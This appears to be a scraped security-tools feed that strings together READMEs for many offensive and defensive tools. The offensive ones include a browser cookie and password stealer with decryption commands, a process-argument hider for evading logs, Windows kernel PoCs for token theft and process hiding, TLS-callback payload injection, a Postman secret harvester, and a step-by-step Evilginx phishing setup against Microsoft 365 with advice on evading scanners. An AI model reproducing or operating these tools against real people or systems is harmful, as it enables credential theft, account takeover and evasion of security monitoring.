  2. debugging-in-windbg--cdb--or-ntsd">Setting Up Kernel-Mode Debugging

Each options require to disable secure boot.

Modules

Detailed information is given in README.md in each project's directories. All modules are tested in Windows 11.

Module Name Description
BlockImageLoad PoCs to block driver loading with Load Image Notify Callback method.
BlockNewProc PoCs to block new process with Process Notify Callback method.
CreateToken PoCs to get full privileged SYSTEM token with ZwCreateToken() API.
DropProcAccess PoCs to drop process handle access with Object Notify Callback.
GetFullPrivs PoCs to get full privileges with DKOM method.
GetProcHandle PoCs to get full access process handle from kernelmode.
InjectLibrary PoCs to perform DLL injection with Kernel APC Injection method.
ModHide PoCs to hide loaded kernel drivers with DKOM method.
ProcHide PoCs to hide process with DKOM method.
ProcProtect PoCs to manipulate Protected Process.
QueryModule PoCs to perform retrieving kernel driver loaded address information.
StealToken PoCs to perform token stealing from kernelmode.

TODO

More PoCs especially about following things will be added later:

  • Notify callback
  • Filesystem mini-filter
  • Network mini-filter

Recommended References



Cookie-Monster - BOF To Steal Browser Cookies & Credentials

By: Zion3R


Steal browser cookies for edge, chrome and firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the python decryption script can help extract those secrets! Firefox module will parse the profiles.ini and locate where the logins.json and key4.db files are located and download them. A seperate github repo is referenced for offline decryption.


BOF Usage

Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] 
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-moster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if chrome PI D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
--edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file

EXE usage

Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
--firefox Locate firefox key and Cookies, does not make a copy of either file

Decryption Steps

Install requirements

pip3 install -r requirements.txt

Base64 encode the webkit masterkey

python3 base64-encode.py "\xec\xfc...."

Decrypt Chrome/Edge Cookies File

python .\decrypt.py "XHh..." --cookies ChromeCookie.db

Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22

Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22

Decrypt Chome/Edge Passwords File

python .\decrypt.py "XHh..." --passwords ChromePasswords.db

Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty

Decrypt Firefox Cookies and Stored Credentials:
https://github.com/lclevy/firepwd

Installation

Ensure Mingw-w64 and make is installed on the linux prior to compiling.

make

to compile exe on windows

gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32

TO-DO

  • update decrypt.py to support firefox based on firepwd and add bruteforce module based on DonPAPI

References

This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI



NoArgs - Tool Designed To Dynamically Spoof And Conceal Process Arguments While Staying Undetected

By: Zion3R


NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.


Default Cmd:


Windows Event Logs:


Using NoArgs:


Windows Event Logs:


Functionality Overview

The tool primarily operates by intercepting process creation calls made by the Windows API function CreateProcessW. When a process is initiated, this function is responsible for spawning the new process, along with any specified command-line arguments. The tool intervenes in this process creation flow, ensuring that the arguments are either hidden or manipulated before the new process is launched.

Hooking Mechanism

Hooking into CreateProcessW is achieved through Detours, a popular library for intercepting and redirecting Win32 API functions. Detours allows for the redirection of function calls to custom implementations while preserving the original functionality. By hooking into CreateProcessW, the tool is able to intercept the process creation requests and execute its custom logic before allowing the process to be spawned.

Process Environment Block (PEB) Manipulation

The Process Environment Block (PEB) is a data structure utilized by Windows to store information about a process's environment and execution state. The tool leverages the PEB to manipulate the command-line arguments of the newly created processes. By modifying the command-line information stored within the PEB, the tool can alter or conceal the arguments passed to the process.

Demo: Running Mimikatz and passing it the arguments:

Process Hacker View:


All the arguemnts are hidden dynamically

Process Monitor View:


Technical Implementation

  1. Injection into Command Prompt (cmd): The tool injects its code into the Command Prompt process, embedding it as Position Independent Code (PIC). This enables seamless integration into cmd's memory space, ensuring covert operation without reliance on specific memory addresses. (Only for The Obfuscated Executable in the releases page)

  2. Windows API Hooking: Detours are utilized to intercept calls to the CreateProcessW function. By redirecting the execution flow to a custom implementation, the tool can execute its logic before the original Windows API function.

  3. Custom Process Creation Function: Upon intercepting a CreateProcessW call, the custom function is executed, creating the new process and manipulating its arguments as necessary.

  4. PEB Modification: Within the custom process creation function, the Process Environment Block (PEB) of the newly created process is accessed and modified to achieve the goal of manipulating or hiding the process arguments.

  5. Execution Redirection: Upon completion of the manipulations, the execution seamlessly returns to Command Prompt (cmd) without any interruptions. This dynamic redirection ensures that subsequent commands entered undergo manipulation discreetly, evading detection and logging mechanisms that relay on getting the process details from the PEB.

Installation and Usage:

Option 1: Compile NoArgs DLL:

  • You will need microsoft/Detours">Microsoft Detours installed.

  • Compile the DLL.

  • Inject the compiled DLL into any cmd instance to manipulate newly created process arguments dynamically.

Option 2: Download the compiled executable (ready-to-go) from the releases page.

Refrences:

  • https://en.wikipedia.org/wiki/Microsoft_Detours
  • https://github.com/microsoft/Detours
  • https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/
  • https://www.ired.team/offensive-security/code-injection-process-injection/how-to-hook-windows-api-using-c++


Frameless-Bitb - A New Approach To Browser In The Browser (BITB) Without The Use Of Iframes, Allowing The Bypass Of Traditional Framebusters Implemented By Login Pages Like Microsoft And The Use With Evilginx

By: Zion3R


A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.

This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.


Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. โ–ถ Watch Video

โ˜•๏ธŽ Buy Me A Coffee

Video Tutorial: ๐Ÿ‘‡

Disclaimer

This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.

Backstory - The Why

Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very conscious the moment they are asked to enter sensitive credentials like emails and passwords.

That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.

The problem is that over the past months/years, major websites like Microsoft implemented various little tricks called "framebusters/framekillers" which mainly attempt to break iframes that might be used to serve the proxied website like in the case of Evilginx.

In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.

The What

A Browser In The Browser (BITB) without any iframes! As simple as that.

Meaning that we can now use BITB with Evilginx on websites like Microsoft.

Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.

The How

Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML besides the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to make the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.

Instructions

Video Tutorial


Local VM:

Create a local Linux VM. (I personally use Ubuntu 22 on VMWare Player or Parallels Desktop)

Update and Upgrade system packages:

sudo apt update && sudo apt upgrade -y

Evilginx Setup:

Optional:

Create a new evilginx user, and add user to sudo group:

sudo su

adduser evilginx

usermod -aG sudo evilginx

Test that evilginx user is in sudo group:

su - evilginx

sudo ls -la /root

Navigate to users home dir:

cd /home/evilginx

(You can do everything as sudo user as well since we're running everything locally)

Setting Up Evilginx

Download and build Evilginx: Official Docs

Copy Evilginx files to /home/evilginx

Install Go: Official Docs

wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
nano ~/.profile

ADD: export PATH=$PATH:/usr/local/go/bin

source ~/.profile

Check:

go version

Install make:

sudo apt install make

Build Evilginx:

cd /home/evilginx/evilginx2
make

Create a new directory for our evilginx build along with phishlets and redirectors:

mkdir /home/evilginx/evilginx

Copy build, phishlets, and redirectors:

cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx

cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors

cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets

Ubuntu firewall quick fix (thanks to @kgretzky)

sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx

On Ubuntu, if you get Failed to start nameserver on: :53 error, try modifying this file

sudo nano /etc/systemd/resolved.conf

edit/add the DNSStubListener to no > DNSStubListener=no

then

sudo systemctl restart systemd-resolved

Modify Evilginx Configurations:

Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.

nano ~/.evilginx/config.json

CHANGE https_port from 443 to 8443

Install Apache2 and Enable Mods:

Install Apache2:

sudo apt install apache2 -y

Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)

sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod proxy_balancer
sudo a2enmod lbmethod_byrequests
sudo a2enmod env
sudo a2enmod include
sudo a2enmod setenvif
sudo a2enmod ssl
sudo a2ensite default-ssl
sudo a2enmod cache
sudo a2enmod substitute
sudo a2enmod headers
sudo a2enmod rewrite
sudo a2dismod access_compat

Start and enable Apache:

sudo systemctl start apache2
sudo systemctl enable apache2

Try if Apache and VM networking works by visiting the VM's IP from a browser on the host machine.

Clone this Repo:

Install git if not already available:

sudo apt -y install git

Clone this repo:

git clone https://github.com/waelmas/frameless-bitb
cd frameless-bitb

Apache Custom Pages:

Make directories for the pages we will be serving:

  • home: (Optional) Homepage (at base domain)
  • primary: Landing page (background)
  • secondary: BITB Window (foreground)
sudo mkdir /var/www/home
sudo mkdir /var/www/primary
sudo mkdir /var/www/secondary

Copy the directories for each page:


sudo cp -r ./pages/home/ /var/www/

sudo cp -r ./pages/primary/ /var/www/

sudo cp -r ./pages/secondary/ /var/www/

Optional: Remove the default Apache page (not used):

sudo rm -r /var/www/html/

Copy the O365 phishlet to phishlets directory:

sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml

Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js and change the CALENDLY_PAGE_NAME and CALENDLY_EVENT_TYPE.

Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.

Self-signed SSL certificates:

Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.

We will use the domain fake.com which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.)

Create dir and parents if they do not exist:

sudo mkdir -p /etc/ssl/localcerts/fake.com/

Generate the SSL certs using the OpenSSL config file:

sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
-config openssl-local.cnf

Modify private key permissions:

sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem

Apache Custom Configs:

Copy custom substitution files (the core of our approach):

sudo cp -r ./custom-subs /etc/apache2/custom-subs

Important Note: In this repo I have included 2 substitution configs for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode and they should act as base templates to achieve the same for other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit our phishing page, you will have to use one of two or implement your own logic for automatic switching.

Both config files under /apache-configs/ are the same, only with a different Include directive used for the substitution file that will be included. (there are 2 references for each file)

# Uncomment the one you want and remember to restart Apache after any changes:
#Include /etc/apache2/custom-subs/win-chrome.conf
Include /etc/apache2/custom-subs/mac-chrome.conf

Simply to make it easier, I included both versions as separate files for this next step.

Windows/Chrome BITB:

sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

Mac/Chrome BITB:

sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

Test Apache configs to ensure there are no errors:

sudo apache2ctl configtest

Restart Apache to apply changes:

sudo systemctl restart apache2

Modifying Hosts:

Get the IP of the VM using ifconfig and note it somewhere for the next step.

We now need to add new entries to our hosts file, to point the domain used in this demo fake.com and all used subdomains to our VM on which Apache and Evilginx are running.

On Windows:

Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)

Click on the File option (top-left) and in the File Explorer address bar, copy and paste the following:

C:\Windows\System32\drivers\etc\

Change the file types (bottom-right) to "All files".

Double-click the file named hosts

On Mac:

Open a terminal and run the following:

sudo nano /private/etc/hosts

Now modify the following records (replace [IP] with the IP of your VM) then paste the records at the end of the hosts file:

# Local Apache and Evilginx Setup
[IP] login.fake.com
[IP] account.fake.com
[IP] sso.fake.com
[IP] www.fake.com
[IP] portal.fake.com
[IP] fake.com
# End of section

Save and exit.

Now restart your browser before moving to the next step.

Note: On Mac, use the following command to flush the DNS cache:

sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder

Important Note:

This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlet get-hosts [PHISHLET_NAME] but remember to replace the 127.0.0.1 with the actual local IP of your VM.

Trusting the Self-Signed SSL Certs:

Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com so we need to make our host machine trust the certificate authority that signed the SSL certs.

For this step, it's easier to follow the video instructions, but here is the gist anyway.

Open https://fake.com/ in your Chrome browser.

Ignore the Unsafe Site warning and proceed to the page.

Click the SSL icon > Details > Export Certificate IMPORTANT: When saving, the name MUST end with .crt for Windows to open it correctly.

Double-click it > install for current user. Do NOT select automatic, instead place the certificate in specific store: select "Trusted Route Certification Authorities".

On Mac: to install for current user only > select "Keychain: login" AND click on "View Certificates" > details > trust > Always trust

Now RESTART your Browser

You should be able to visit https://fake.com now and see the homepage without any SSL warnings.

Running Evilginx:

At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.

Optional: Install tmux (to keep evilginx running even if the terminal session is closed. Mainly useful when running on remote VM.)

sudo apt install tmux -y

Start Evilginx in developer mode (using tmux to avoid losing the session):

tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer

(To re-attach to the tmux session use tmux attach-session -t evilginx)

Evilginx Config:

config domain fake.com
config ipv4 127.0.0.1

IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.

blacklist noadd

Setup Phishlet and Lure:

phishlets hostname O365 fake.com
phishlets enable O365
lures create O365
lures get-url 0

Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).

Useful Resources

Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB

Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery

My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg

How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation

Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/

TODO

  • Create script(s) to automate most of the steps


Toolkit - The Essential Toolkit For Reversing, Malware Analysis, And Cracking

By: Zion3R


This tool compilation is carefully crafted with the purpose of being useful both for the beginners and veterans from the malware analysis world. It has also proven useful for people trying their luck at the cracking underworld.

It's the ideal complement to be used with the manuals from the site, and to play with the numbered theories mirror.


Advantages

To be clear, this pack is thought to be the most complete and robust in existence. Some of the pros are:

  1. It contains all the basic (and not so basic) tools that you might need in a real life scenario, be it a simple or a complex one.

  2. The pack is integrated with an Universal Updater made by us from scratch. Thanks to that, we get to mantain all the tools in an automated fashion.

  3. It's really easy to expand and modify: you just have to update the file bin\updater\tools.ini to integrate the tools you use to the updater, and then add the links for your tools to bin\sendto\sendto, so they appear in the context menus.

  4. The installer sets up everything we might need automatically - everything, from the dependencies to the environment variables, and it can even add a scheduled task to update the whole pack of tools weekly.

Installation

  1. You can simply download the stable versions from the release section, where you can also find the installer.

  2. Once downloaded, you can update the tools with the Universal Updater that we specifically developed for that sole purpose.
    You will find the binary in the folder bin\updater\updater.exe.

Tool set

This toolkit is composed by 98 apps that cover everything we might need to perform reverse engineering and binary/malware analysis.
Every tool has been downloaded from their original/official websites, but we still recommend you to use them with caution, specially those tools whose official pages are forum threads. Always exercise common sense.
You can check the complete list of tools here.

About contributions

Pull Requests are welcome. If you'd want to propose big changes, you should first create an Issue about it, so we all can analyze and discuss it. The tools are compressed with 7-zip, and the format used for nomenclature is {name} - {version}.7z



Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams

By: Zion3R


Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconaissance / OSINT framework for Postman. While existing tools are great proof of concepts, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration to recon beyond secrets. We realized we required capabilities that were "secret-agnostic", and had enough flexibility to capture false-positives that still provided offensive value.

Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:

  • Workspaces
  • Collections
  • Requests
  • Users
  • Teams

Installation

python3 -m pip install porch-pirate

Using the client

The Porch Pirate client can be used to nearly fully conduct reviews on public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.

Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.

  • --globals
  • --collections
  • --requests
  • --urls
  • --dump
  • --raw
  • --curl

Simple Search

porch-pirate -s "coca-cola.com"

Get Workspace Globals

By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

Dump Workspace

When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

Automatic Search and Globals Extraction

Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

porch-pirate -s "shopify" --globals

Automatic Search Dump

Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

porch-pirate -s "coca-cola.com" --dump

Extract URLs from Workspace

A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls

Automatic URL Extraction

Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

porch-pirate -s "coca-cola.com" --urls

Show Collections in a Workspace

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

Show Workspace Requests

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

Show raw JSON

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

Show Entity Information

porch-pirate -w WORKSPACE_ID
porch-pirate -c COLLECTION_ID
porch-pirate -r REQUEST_ID
porch-pirate -u USERNAME/TEAMNAME

Convert Request to Curl

Porch Pirate can build curl requests when provided with a request ID for easier testing.

porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

Use a proxy

porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080

Using as a library

Searching

p = porchpirate()
print(p.search('coca-cola.com'))

Get Workspace Collections

p = porchpirate()
print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Dumping a Workspace

p = porchpirate()
collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
for collection in collections['data']:
requests = collection['requests']
for r in requests:
request_data = p.request(r['id'])
print(request_data)

Grabbing a Workspace's Globals

p = porchpirate()
print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Other Examples

Other library usage examples can be located in the examples directory, which contains the following examples:

  • dump_workspace.py
  • format_search_results.py
  • format_workspace_collections.py
  • format_workspace_globals.py
  • get_collection.py
  • get_collections.py
  • get_profile.py
  • get_request.py
  • get_statistics.py
  • get_team.py
  • get_user.py
  • get_workspace.py
  • recursive_globals_from_search.py
  • request_to_curl.py
  • search.py
  • search_by_page.py
  • workspace_collections.py


APKDeepLens - Android Security Insights In Full Spectrum

By: Zion3R


APKDeepLens is a Python based tool designed to scan Android applications (APK files) for security vulnerabilities. It specifically targets the OWASP Top 10 mobile vulnerabilities, providing an easy and efficient way for developers, penetration testers, and security researchers to assess the security posture of Android apps.


Features

APKDeepLens is a Python-based tool that performs various operations on APK files. Its main features include:

  • APK Analysis -> Scans Android application package (APK) files for security vulnerabilities.
  • OWASP Coverage -> Covers OWASP Top 10 vulnerabilities to ensure a comprehensive security assessment.
  • Advanced Detection -> Utilizes custom python code for APK file analysis and vulnerability detection.
  • Sensitive Information Extraction -> Identifies potential security risks by extracting sensitive information from APK files, such as insecure authentication/authorization keys and insecure request protocols.
  • In-depth Analysis -> Detects insecure data storage practices, including data related to the SD card, and highlights the use of insecure request protocols in the code.
  • Intent Filter Exploits -> Pinpoint vulnerabilities by analyzing intent filters extracted from AndroidManifest.xml.
  • Local File Vulnerability Detection -> Safeguard your app by identifying potential mishandlings related to local file operations
  • Report Generation -> Generates detailed and easy-to-understand reports for each scanned APK, providing actionable insights for developers.
  • CI/CD Integration -> Designed for easy integration into CI/CD pipelines, enabling automated security testing in development workflows.
  • User-Friendly Interface -> Color-coded terminal outputs make it easy to distinguish between different types of findings.

Installation

To use APKDeepLens, you'll need to have Python 3.8 or higher installed on your system. You can then install APKDeepLens using the following command:

For Linux

git clone https://github.com/d78ui98/APKDeepLens/tree/main
cd /APKDeepLens
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python APKDeepLens.py --help

For Windows

git clone https://github.com/d78ui98/APKDeepLens/tree/main
cd \APKDeepLens
python3 -m venv venv
.\venv\Scripts\activate
pip install -r .\requirements.txt
python APKDeepLens.py --help

Usage

To simply scan an APK, use the below command. Mention the apk file with -apk argument. Once the scan is complete, a detailed report will be displayed in the console.

python3 APKDeepLens.py -apk file.apk

If you've already extracted the source code and want to provide its path for a faster scan you can use the below command. Mention the source code of the android application with -source parameter.

python3 APKDeepLens.py -apk file.apk -source <source-code-path>

To generate detailed PDF and HTML reports after the scan you can pass -report argument as mentioned below.

python3 APKDeepLens.py -apk file.apk -report

Contributing

We welcome contributions to the APKDeepLens project. If you have a feature request, bug report, or proposal, please open a new issue here.

For those interested in contributing code, please follow the standard GitHub process. We'll review your contributions as quickly as possible :)

Featured at



RemoteTLSCallbackInjection - Utilizing TLS Callbacks To Execute A Payload Without Spawning Any Threads In A Remote Process

By: Zion3R


This method utilizes TLS callbacks to execute aย payloadย without spawning any threads in a remote process. This method is inspired byย Threadless Injectionย as RemoteTLSCallbackInjection does not invoke any API calls to trigger the injectedย payload.

Quick Links

Maldev Academy Home

Maldev Academy Syllabus

Related Maldev Academy Modules

New Module 34: TLS Callbacks For Anti-Debugging

New Module 35: Threadless Injection



Implementation Steps

The PoC follows these steps:

  1. Create a suspended process using the CreateProcessViaWinAPIsW function (i.e. RuntimeBroker.exe).
  2. Fetch the remote process image base address followed by reading the process's PE headers.
  3. Fetch an address to a TLS callback function.
  4. Patch a fixed shellcode (i.e. g_FixedShellcode) with runtime-retrieved values. This shellcode is responsible for restoring both original bytes and memory permission of the TLS callback function's address.
  5. Inject both shellcodes: g_FixedShellcode and the main payload.
  6. Patch the TLS callback function's address and replace it with the address of our injected payload.
  7. Resume process.

The g_FixedShellcode shellcode will then make sure that the main payload executes only once by restoring the original TLS callback's original address before calling the main payload. A TLS callback can execute multiple times across the lifespan of a process, therefore it is important to control the number of times the payload is triggered by restoring the original code path execution to the original TLS callback function.

Demo

The following image shows our implementation, RemoteTLSCallbackInjection.exe, spawning a cmd.exe as its main payload.



Sicat - The Useful Exploit Finder

By: Zion3R

Introduction

SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.


SiCat Resources

Installation

git clone https://github.com/justakazh/sicat.git && cd sicat

pip install -r requirements.txt

Usage


~$ python sicat.py --help

Command Line Options:

Command Description
-h Show help message and exit
-k KEYWORD
-kv KEYWORK_VERSION
-nm Identify via nmap output
--nvd Use NVD as info source
--packetstorm Use PacketStorm as info source
--exploitdb Use ExploitDB as info source
--exploitalert Use ExploitAlert as info source
--msfmoduke Use metasploit as info source
-o OUTPUT Path to save output to
-ot OUTPUT_TYPE Output file type: json or html

Examples

From keyword


python sicat.py -k telerik --exploitdb --msfmodule

From nmap output


nmap --open -sV localhost -oX nmap_out.xml
python sicat.py -nm nmap_out.xml --packetstorm

To-do

  • [ ] Input from nmap result from pipeline
  • [ ] Nmap multiple host support
  • [ ] Search NSE Script
  • [ ] Search by PORT

Contribution

I'm aware that perfection is elusive in coding. If you come across any bugs, feel free to contribute by fixing the code or suggesting new features. Your input is always welcomed and valued.



CloudGrappler - A purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure

By: Zion3R


Permiso: https://permiso.io
Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments

CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.


Notes

To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.

Required Packages

bash pip3 install -r requirements.txt

Cloning cloudgrep locally

To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.

bash chmod +x clone.sh ./clone.sh

Input

This tool offers a CLI (Command Line Interface). As such, here we review its use:

Example 1 - Running the tool with default queries file

Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:

Note

Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.

{
"AWS": [
{
"bucket": "cloudtrail-logs-00000000-ffffff",
"prefix": [
"testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
"testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
]
},
{
"bucket": "aws-kosova-us-east-1-00000000"
}

],
"AZURE": [
{
"accountname": "logs",
"container": [
"cloudgrappler"
]
}
]
}

Run command

python3 main.py

Example 2 - Permiso Intel Use Case

python3 main.py -p

[+] Running GetFileDownloadUrls.*secrets_ for AWS 
[+] Threat Actor: LUCR3
[+] Severity: MEDIUM
[+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers.This however may be a part of your normal business use case.

Example 3 - Generate report

python3 main.py -p -jo

reports
โ””โ”€โ”€ json
โ”œโ”€โ”€ AWS
โ”‚ย ย  โ””โ”€โ”€ 2024-03-04 01:01 AM
